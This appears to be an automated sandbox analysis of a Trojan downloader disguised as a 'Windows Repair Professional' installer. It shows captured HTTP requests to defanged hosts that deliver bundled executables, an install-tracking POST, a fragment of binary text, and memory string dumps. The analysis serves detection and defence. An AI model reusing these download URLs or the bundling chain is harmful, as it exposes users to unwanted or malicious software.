<<< skipped >>>

GET /launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1 HTTP/1.0

Host: tap.winre.xyz

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 2322

Connection: close

Date: Thu, 13 Aug 2015 00:45:46 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: e2PKLPDCLOe9qGBiUN-s8dMvvEQm5jyb7gjuvI2-p-s-0xCQqXSOzg==

files=4.t1=dl.u1=hXXp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%2520Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11.n1=cpSetup.exe.b1=cp.c1=sevenzip-1.s1=0.m1=0.d1=0.t2=dl.u2=hXXp://stapi.sweetcomet.com/api/stamp/setup.exe?&affiliateid=1780&productname=Windows%20Repair%20Professional%20%28A&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-setup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/pe/szip_pub.png&productversion=9.20&producteula=http://sevenzip.info/terms.html&productsize=1.06MB&productcmd=s&publishercontact=http://sevenzip.info&productbusiness=sd,se,ad,co,prm%2Cwsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132.n2=SevenZip-apset.exe.b2=ap.c2=sevenzip.s2=0.m2=0.d2=0.t3=dl.u3=hXXp://b.byteguardoptic.com/de/?q=YWZmaWxpYXRlX2lkPTczNS00MjcyMTMyJmZpbGVzaXplPTIuNE1iJnB1Ymxpc2hlcklkPTI0NDM3JnByb2R1Y3RfbmFtZT1XaW5kb3dzJTIwUmVwYWlyJTIwUHJvZmVzc2lvbmFsJTIwKEEmcHJvZHVjdF90aXRsZT1XaW5kb3dzJTIwUmVwYWlyJTIwUHJvZmVzc2lvbmFsJTIwKEEmcHJvZHVjdF9kb3dubG9hZF91cmw9aHR0cCUzYSUyZiUyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=.n3=sevensetup.exe.b3=rx.c3=sevenzip-1.s3=0.m3=0.d3=0.t4=dl.u4=hXXp://get.file136desktop.info/DownloadManager/Get?p=638&d=544&l=461&n=1&productname=sevenzip&d1=4272132&d2=735&dynamicname=Windows%2520Repair%20Professional%20%28A.n4=setup-1228.exe.b4=ru.c4=

<<< skipped >>>

GET /launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe HTTP/1.0

Host: get.fc-gosh.biz

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8

Content-Length: 179

Connection: close

Date: Thu, 13 Aug 2015 00:45:43 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

X-Cache: Miss from cloudfront

Via: 1.1 017ee4b2e5ba6b7a7dd1443f39b6e832.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 6QMHXEHuHyMgYmFpY2cxVQprTEKUWi9cTaXED_52oB9UA-kWfyWXOA==

s=first..u=hXXp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial..

GET /?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11 HTTP/1.0

Host: get.cp-retr.xyz

User-Agent: NSISDL/1.2 (Mozilla)

Accept: */*

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 52212

Connection: close

Server: Microsoft-IIS/8.5

X-Powered-By: PHP/5.3.28

Content-Transfer-Encoding: Binary

Content-Disposition: attachment; filename="cpSetup.exe"

Date: Thu, 13 Aug 2015 00:45:47 GMT

X-Cache: Miss from cloudfront

Via: 1.1 1415e6a9d308119037d1fa89386da72a.cloudfront.net (CloudFront)

X-Amz-Cf-Id: qGMncVdA41NlISK5tz1w3zzoOgUy1l5m5tOFRCo78IYhdCrny4lkfQ==

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s...........,...........................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc....,...........v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..

<<< skipped >>>

POST hXXp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA HTTP/1.1

Host: up.int-cp-234.xyz

Connection: close

Accept: */*

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3

Content-Type: application/x-www-form-urlencoded

id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57

HTTP/1.1 403 Forbidden

Server: CloudFront

Date: Thu, 13 Aug 2015 00:45:54 GMT

Content-Type: text/html

Content-Length: 689

Connection: close

X-Cache: Error from cloudfront

Via: 1.1 3abf650c7bf73e47515000bddf3f05c0.cloudfront.net (CloudFront)

X-Amz-Cf-Id: REjTGRmXn_8nncDgoS9GZJ4edoj36PxlfVllu7Meu93cKxV_YMqptg==

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://VVV.w3.org/TR/html4/loose.dtd">.<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">.<TITLE>ERROR: The request could not be satisfied</TITLE>.</HEAD><BODY>.<H1>ERROR</H1>.<H2>The request could not be satisfied.</H2>.<HR noshade size="1px">.This distribution is not configured to allow the HTTP request method that was used for this request. The distribution supports only cachable requests..<BR clear="all">.<HR noshade size="1px">.<PRE>.Generated by cloudfront (CloudFront).Request ID: REjTGRmXn_8nncDgoS9GZJ4edoj36PxlfVllu7Meu93cKxV_YMqptg==.</PRE>.<ADDRESS>.</ADDRESS>.</BODY></HTML>..

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_1616:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|/":

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NojM0TDHJX.exe

tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NSISdl.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp

ogram=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial

.reloc

WS2_32.dll

NSISdl.dll

invalid URL

Host: %s

GET %s HTTP/1.0

User-Agent: NSISDL/1.2 (Mozilla)

http=

Software\Microsoft\Windows\CurrentVersion\Internet Settings

Unable to open %s

%skB (%d%%) of %skB at %u.ukB/s

(%u hours remaining)

(%u minutes remaining)

(%u seconds remaining)

Downloading %s

System.dll

callback%d

KERNEL32.DLL

COMDLG32.dll

IPHLPAPI.DLL

MPR.dll

OLEAUT32.dll

PSAPI.DLL

USERENV.dll

UxTheme.dll

WININET.dll

WINMM.dll

WSOCK32.dll

FtpOpenFileW

hXXp://VVV.usertrust.com1

1hXXp://crl.usertrust.com/UTN-USERFirst-Object.crl05

hXXp://ocsp.usertrust.com0

hXXps://secure.comodo.net/CPS0C

2hXXp://crl.comodoca.com/COMODORSACodeSigningCA.crl0t

2hXXp://crt.comodoca.com/COMODORSACodeSigningCA.crt0$

hXXp://ocsp.comodoca.com0

shane@tweaking.com0

"COMODO RSA Certification Authority0

;hXXp://crl.comodoca.com/COMODORSACertificationAuthority.crl0q

/hXXp://crt.comodoca.com/COMODORSAAddTrustCA.crt0$

nsd2.tmp

E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\S

ram=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial

l.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial

c:\%original file name%.exe

%original file name%.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

201508130045

hXXp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial

Nullsoft Install System v2.46

%original file name%.exe_1616_rwx_10004000_00001000:

callback%d

NojM0TDHJX.exe_1980:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|/":

"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe"

_downloader-Q4gYjE1gv.exe

instid[appsetupurl]=http://pe-sixi.com/downloadS.php?bu=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=

UyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=

sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\BgWorker.dll

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\BgWorker.dll

%d/at

key=end

} .rdata

KERNEL32.DLL

nsArray.dll

Join

.reloc

System.dll

callback%d

@.reloc

ButtonEvent.dll

`.reloc

MsgWaitForMultipleObjects

BgWorker.dll

LangDLL.dll

W.vS|

Windows Repair Professional (A Setup

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp

cpSetup.exe

Fbu=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=

19458637

x.exe

staller.com/installer/?iid=324&nsoft=9

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp\NojM0TDHJX.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd2.tmp

NojM0TDHJX.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx3.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

722076380

2107457

1393165021

1124729953

hXXp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11

=am&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png&prefix=Setup&instid[thankyoupage]=

iUyZmQzcGNjdXAxOXhkYTJ0LmNsb3VkZnJvbnQubmV0JTJmc2V2ZW56aXAtc2V0dXAtcnguZXhlJnByb2R1Y3RfZmlsZV9uYW1lPXNldmVuc2V0dXAuZXhlJmluc3RhbGxlcl9maWxlX25hbWU9c2V0dXA=

=sd,se,ad,co,prm,wsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132

0.x.exe

Q4gYjE1gv.exe

)-.Yln

Nullsoft Install System v2.46

1.1.1.6

1.0.0.8

NojM0TDHJX.exe_1980_rwx_003D4000_00001000:

callback%d

NojM0TDHJX.exe_1980_rwx_10001000_00007000:

/key=

.text

`.rdata

@.data

.rsrc

@.reloc

cpSetup.exe_568:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|/":

\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp

%Program Files%

\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll

$$\wininit.ini

@.reloc

subid1: %s

subid2: %s

subid3: %s

subid4: %s

subid5: %s

url1: %s

url2: %s

apptitle: %S

appimgurl: %s

appsetupurl: %s

appcmd: %s

apptyurl: %s

appversion: %s

Offer path: %s

Offer retruned: %s

hXXp://

Stub.dll

GetProcessHeap

nsx8.tmp

:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx8.tmp

"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe"

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp

cpSetup.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsx6.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn5.tmp\cpSetup.exe

:::#222.111 )))

Nullsoft Install System v2.46

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps